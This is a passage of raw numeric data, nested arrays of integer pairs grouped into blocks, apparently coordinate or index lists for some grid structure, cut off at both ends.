24],[ 7 , 25],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 19],[ 9 , 23],[ 9 , 24],[ 9 , 25],[ 9 , 29],[ 9 , 30],[ 9 , 31],[ 9 , 35],[ 9 , 36],[ 9 , 37],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 20],[ 12 , 23],[ 12 , 26],[ 12 , 27],[ 12 , 29],[ 12 , 32],[ 12 , 33],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 13 , 20],[ 13 , 23],[ 13 , 26],[ 13 , 27],[ 13 , 29],[ 13 , 32],[ 13 , 33],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 28],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 15 , 38],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 28],[ 16 , 31],[ 16 , 33],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 1 , 31],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 2 , 31],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 25],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 5 , 37],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 22],[ 8 , 26],[ 8 , 27],[ 8 , 28],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 38],[ 8 , 39],[ 8 , 40],[ 9 , 22],[ 9 , 26],[ 9 , 27],[ 9 , 28],[ 9 , 32],[ 9 , 33],[ 9 , 34],[ 9 , 38],[ 9 , 39],[ 9 , 40],[ 10 , 22],[ 10 , 26],[ 10 , 27],[ 10 , 28],[ 10 , 32],[ 10 , 33],[ 10 , 34],[ 10 , 38],[ 10 , 39],[ 10 , 40],[ 11 , 23],[ 11 , 26],[ 11 , 29],[ 11 , 30],[ 11 , 32],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 11 , 39],[ 11 , 41],[ 12 , 23],[ 12 , 26],[ 12 , 29],[ 12 , 30],[ 12 , 32],[ 12 , 35],[ 12 , 36],[ 12 , 38],[ 12 , 39],[ 12 , 41],[ 13 , 23],[ 13 , 26],[ 13 , 29],[ 13 , 30],[ 13 , 32],[ 13 , 35],[ 13 , 36],[ 13 , 38],[ 13 , 39],[ 13 , 41],[ 14 , 23],[ 14 , 26],[ 14 , 29],[ 14 , 30],[ 14 , 32],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 14 , 41],[ 15 , 24],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 15 , 41],[ 16 , 24],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 37],[ 16 , 38],[ 16 , 40],[ 16 , 41],[ 17 , 24],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 40],[ 17 , 41],[ 18 , 25],[ 18 , 28],[ 18 , 30],[ 18 , 31],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 18 , 41],[ 19 , 25],[ 19 , 28],[ 19 , 30],[ 19 , 31],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 19 , 41],[ 20 , 25],[ 20 , 28],[ 20 , 30],[ 20 , 31],[ 20 , 34],[ 20 , 36],[ 20 , 37],[ 20 , 39],[ 20 , 40],[ 20 , 41],[ 21 , 25],[ 21 , 28],[ 21 , 30],[ 21 , 31],[ 21 , 34],[ 21 , 36],[ 21 , 37],[ 21 , 39],[ 21 , 40],[ 21 , 41]],[ [1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 4 , 36],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 21],[ 8 , 25],[ 8 , 26],[ 8 , 27],[ 8 , 31],[ 8 , 32],[ 8 , 33],[ 8 , 37],[ 8 , 38],[ 8 , 39],[ 9 , 21],[ 9 , 25],[ 9 , 26],[ 9 , 27],[ 9 , 31],[ 9 , 32],[ 9 , 33],[ 9 , 37],[ 9 , 38],[ 9 , 39],[ 10 , 21],[ 10 , 25],[ 10 , 26],[ 10 , 27],[ 10 , 31],[ 10 , 32],[ 10 , 33],[ 10 , 37],[ 10 , 38],[ 10 , 39],[ 11 , 21],[ 11 , 25],[ 11 , 26],[ 11 , 27],[ 11 , 31],[ 11 , 32],[ 11 , 33],[ 11 , 37],[ 11 , 38],[ 11 , 39],[ 12 , 22],[ 12 , 25],[ 12 , 28],[ 12 , 29],[ 12 , 31],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 12 , 40],[ 13 , 22],[ 13 , 25],[ 13 , 28],[ 13 , 29],[ 13 , 31],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 13 , 40],[ 14 , 22],[ 14 , 25],[ 14 , 28],[ 14 , 29],[ 14 , 31],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 14 , 40],[ 15 , 22],[ 15 , 25],[ 15 , 28],[ 15 , 29],[ 15 , 31],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 15 , 40],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 39],[ 16 , 40],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 39],[ 17 , 40],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 30],[ 18 , 32],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 39],[ 18 , 40],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 30],[ 19 , 32],[ 19 , 34],[ 19 , 36],[ 19 , 37],[ 19 , 39],[ 19 , 40],[ 20 , 24],[ 20 , 27],[ 20 , 29],[ 20 , 30],[ 20 , 33],[ 20 , 35],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 40]],[ [1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 1 , 30],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 2 , 30],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 24],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 5 , 36],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 24],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 6 , 36],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 24],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 7 , 36],[ 8 , 21],[ 8 , 22],[ 8 , 23],[ 8 , 24],[ 8 , 31],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 8 , 35],[ 8 , 36],[ 9 , 21],[ 9 , 25],[ 9 , 26],[ 9 , 27],[ 9 , 31],[ 9 , 32],[ 9 , 33],[ 9 , 37],[ 9 , 38],[ 9 , 39],[ 10 , 22],[ 10 , 25],[ 10 , 28],[ 10 , 29],[ 10 , 31],[ 10 , 34],[ 10 , 35],[ 10 , 37],[ 10 , 38],[ 10 , 40],[ 11 , 22],[ 11 , 25],[ 11 , 28],[ 11 , 29],[ 11 , 31],[ 11 , 34],[ 11 , 35],[ 11 , 37],[ 11 , 38],[ 11 , 40],[ 12 , 22],[ 12 , 25],[ 12 , 28],[ 12 , 29],[ 12 , 31],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 12 , 40],[ 13 , 22],[ 13 , 25],[ 13 , 28],[ 13 , 29],[ 13 , 31],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 13 , 40],[ 14 , 23],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 36],[ 14 , 37],[ 14 , 39],[ 14 , 40],[ 15 , 23],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 36],[ 15 , 37],[ 15 , 39],[ 15 , 40],[ 16 , 23],[ 16 , 26],[ 16 , 28],[ 16 , 30],[ 16 , 32],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 39],[ 16 , 40],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 30],[ 17 , 32],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 39],[ 17 , 40],[ 18 , 24],[ 18 , 27],[ 18 , 29],[ 18 , 30],[ 18 , 33],[ 18 , 35],[ 18 , 36],[ 18 , 38],[ 18 , 39],[ 18 , 40],[ 19 , 24],[ 19 , 27],[ 19 , 29],[ 19 , 30],[ 19 , 33],[ 19 , 35],[ 19 , 36],[ 19 , 38],[ 19 , 39],[ 19 , 40],[ 20 , 24],[ 20 , 27],[ 20 , 29],[ 20 , 30],[ 20 , 33],[ 20 , 35],[ 20 , 36],[ 20 , 38],[ 20 , 39],[ 20 , 40]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 4 , 35],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 23],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 7 , 35],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 21],[ 10 , 24],[ 10 , 27],[ 10 , 28],[ 10 , 30],[ 10 , 33],[ 10 , 34],[ 10 , 36],[ 10 , 37],[ 10 , 39],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 29],[ 17 , 31],[ 17 , 33],[ 17 , 35],[ 17 , 36],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 1 , 29],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 2 , 29],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 23],[ 4 , 24],[ 4 , 25],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 23],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 5 , 35],[ 6 , 20],[ 6 , 21],[ 6 , 22],[ 6 , 23],[ 6 , 30],[ 6 , 31],[ 6 , 32],[ 6 , 33],[ 6 , 34],[ 6 , 35],[ 7 , 20],[ 7 , 24],[ 7 , 25],[ 7 , 26],[ 7 , 30],[ 7 , 31],[ 7 , 32],[ 7 , 36],[ 7 , 37],[ 7 , 38],[ 8 , 20],[ 8 , 24],[ 8 , 25],[ 8 , 26],[ 8 , 30],[ 8 , 31],[ 8 , 32],[ 8 , 36],[ 8 , 37],[ 8 , 38],[ 9 , 20],[ 9 , 24],[ 9 , 25],[ 9 , 26],[ 9 , 30],[ 9 , 31],[ 9 , 32],[ 9 , 36],[ 9 , 37],[ 9 , 38],[ 10 , 20],[ 10 , 24],[ 10 , 25],[ 10 , 26],[ 10 , 30],[ 10 , 31],[ 10 , 32],[ 10 , 36],[ 10 , 37],[ 10 , 38],[ 11 , 21],[ 11 , 24],[ 11 , 27],[ 11 , 28],[ 11 , 30],[ 11 , 33],[ 11 , 34],[ 11 , 36],[ 11 , 37],[ 11 , 39],[ 12 , 21],[ 12 , 24],[ 12 , 27],[ 12 , 28],[ 12 , 30],[ 12 , 33],[ 12 , 34],[ 12 , 36],[ 12 , 37],[ 12 , 39],[ 13 , 21],[ 13 , 24],[ 13 , 27],[ 13 , 28],[ 13 , 30],[ 13 , 33],[ 13 , 34],[ 13 , 36],[ 13 , 37],[ 13 , 39],[ 14 , 22],[ 14 , 25],[ 14 , 27],[ 14 , 29],[ 14 , 31],[ 14 , 33],[ 14 , 35],[ 14 , 36],[ 14 , 38],[ 14 , 39],[ 15 , 22],[ 15 , 25],[ 15 , 27],[ 15 , 29],[ 15 , 31],[ 15 , 33],[ 15 , 35],[ 15 , 36],[ 15 , 38],[ 15 , 39],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 29],[ 16 , 31],[ 16 , 33],[ 16 , 35],[ 16 , 36],[ 16 , 38],[ 16 , 39],[ 17 , 23],[ 17 , 26],[ 17 , 28],[ 17 , 29],[ 17 , 32],[ 17 , 34],[ 17 , 35],[ 17 , 37],[ 17 , 38],[ 17 , 39],[ 18 , 23],[ 18 , 26],[ 18 , 28],[ 18 , 29],[ 18 , 32],[ 18 , 34],[ 18 , 35],[ 18 , 37],[ 18 , 38],[ 18 , 39],[ 19 , 23],[ 19 , 26],[ 19 , 28],[ 19 , 29],[ 19 , 32],[ 19 , 34],[ 19 , 35],[ 19 , 37],[ 19 , 38],[ 19 , 39]],[ [1 , 16],[ 1 , 17],[ 1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 2 , 16],[ 2 , 17],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 3 , 16],[ 3 , 17],[ 3 , 18],[ 3 , 19],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 3 , 29],[ 3 , 30],[ 3 , 31],[ 4 , 16],[ 4 , 17],[ 4 , 18],[ 4 , 19],[ 4 , 26],[ 4 , 27],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 5 , 16],[ 5 , 17],[ 5 , 18],[ 5 , 19],[ 5 , 26],[ 5 , 27],[ 5 , 28],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 6 , 16],[ 6 , 17],[ 6 , 18],[ 6 , 19],[ 6 , 26],[ 6 , 27],[ 6 , 28],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 7 , 16],[ 7 , 20],[ 7 , 21],[ 7 , 22],[ 7 , 26],[ 7 , 27],[ 7 , 28],[ 7 , 32],[ 7 , 33],[ 7 , 34],[ 8 , 16],[ 8 , 20],[ 8 , 21],[ 8 , 22],[ 8 , 26],[ 8 , 27],[ 8 , 28],[ 8 , 32],[ 8 , 33],[ 8 , 34],[ 9 , 17],[ 9 , 20],[ 9 , 23],[ 9 , 24],[ 9 , 26],[ 9 , 29],[ 9 , 30],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 10 , 17],[ 10 , 20],[ 10 , 23],[ 10 , 24],[ 10 , 26],[ 10 , 29],[ 10 , 30],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 11 , 17],[ 11 , 20],[ 11 , 23],[ 11 , 24],[ 11 , 26],[ 11 , 29],[ 11 , 30],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 12 , 17],[ 12 , 20],[ 12 , 23],[ 12 , 24],[ 12 , 26],[ 12 , 29],[ 12 , 30],[ 12 , 32],[ 12 , 33],[ 12 , 35],[ 13 , 19],[ 13 , 22],[ 13 , 24],[ 13 , 25],[ 13 , 28],[ 13 , 30],[ 13 , 31],[ 13 , 33],[ 13 , 34],[ 13 , 35],[ 14 , 19],[ 14 , 22],[ 14 , 24],[ 14 , 25],[ 14 , 28],[ 14 , 30],[ 14 , 31],[ 14 , 33],[ 14 , 34],[ 14 , 35],[ 15 , 19],[ 15 , 22],[ 15 , 24],[ 15 , 25],[ 15 , 28],[ 15 , 30],[ 15 , 31],[ 15 , 33],[ 15 , 34],[ 15 , 35]],[ [1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 1 , 28],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 2 , 28],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 3 , 28],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 22],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 4 , 32],[ 4 , 33],[ 4 , 34],[ 5 , 19],[ 5 , 20],[ 5 , 21],[ 5 , 22],[ 5 , 29],[ 5 , 30],[ 5 , 31],[ 5 , 32],[ 5 , 33],[ 5 , 34],[ 6 , 19],[ 6 , 23],[ 6 , 24],[ 6 , 25],[ 6 , 29],[ 6 , 30],[ 6 , 31],[ 6 , 35],[ 6 , 36],[ 6 , 37],[ 7 , 19],[ 7 , 23],[ 7 , 24],[ 7 , 25],[ 7 , 29],[ 7 , 30],[ 7 , 31],[ 7 , 35],[ 7 , 36],[ 7 , 37],[ 8 , 19],[ 8 , 23],[ 8 , 24],[ 8 , 25],[ 8 , 29],[ 8 , 30],[ 8 , 31],[ 8 , 35],[ 8 , 36],[ 8 , 37],[ 9 , 20],[ 9 , 23],[ 9 , 26],[ 9 , 27],[ 9 , 29],[ 9 , 32],[ 9 , 33],[ 9 , 35],[ 9 , 36],[ 9 , 38],[ 10 , 20],[ 10 , 23],[ 10 , 26],[ 10 , 27],[ 10 , 29],[ 10 , 32],[ 10 , 33],[ 10 , 35],[ 10 , 36],[ 10 , 38],[ 11 , 20],[ 11 , 23],[ 11 , 26],[ 11 , 27],[ 11 , 29],[ 11 , 32],[ 11 , 33],[ 11 , 35],[ 11 , 36],[ 11 , 38],[ 12 , 21],[ 12 , 24],[ 12 , 26],[ 12 , 28],[ 12 , 30],[ 12 , 32],[ 12 , 34],[ 12 , 35],[ 12 , 37],[ 12 , 38],[ 13 , 21],[ 13 , 24],[ 13 , 26],[ 13 , 28],[ 13 , 30],[ 13 , 32],[ 13 , 34],[ 13 , 35],[ 13 , 37],[ 13 , 38],[ 14 , 21],[ 14 , 24],[ 14 , 26],[ 14 , 28],[ 14 , 30],[ 14 , 32],[ 14 , 34],[ 14 , 35],[ 14 , 37],[ 14 , 38],[ 15 , 21],[ 15 , 24],[ 15 , 26],[ 15 , 28],[ 15 , 30],[ 15 , 32],[ 15 , 34],[ 15 , 35],[ 15 , 37],[ 15 , 38],[ 16 , 22],[ 16 , 25],[ 16 , 27],[ 16 , 28],[ 16 , 31],[ 16 , 33],[ 16 , 34],[ 16 , 36],[ 16 , 37],[ 16 , 38],[ 17 , 22],[ 17 , 25],[ 17 , 27],[ 17 , 28],[ 17 , 31],[ 17 , 33],[ 17 , 34],[ 17 , 36],[ 17 , 37],[ 17 , 38],[ 18 , 22],[ 18 , 25],[ 18 , 27],[ 18 , 28],[ 18 , 31],[ 18 , 33],[ 18 , 34],[ 18 , 36],[ 18 , 37],[ 18 , 38]],[ [1 , 18],[ 1 , 19],[ 1 , 20],[ 1 , 21],[ 1 , 22],[ 1 , 23],[ 1 , 24],[ 1 , 25],[ 1 , 26],[ 1 , 27],[ 2 , 18],[ 2 , 19],[ 2 , 20],[ 2 , 21],[ 2 , 22],[ 2 , 23],[ 2 , 24],[ 2 , 25],[ 2 , 26],[ 2 , 27],[ 3 , 18],[ 3 , 19],[ 3 , 20],[ 3 , 21],[ 3 , 22],[ 3 , 23],[ 3 , 24],[ 3 , 25],[ 3 , 26],[ 3 , 27],[ 4 , 18],[ 4 , 19],[ 4 , 20],[ 4 , 21],[ 4 , 28],[ 4 , 29],[ 4 , 30],[ 4 , 31],[ 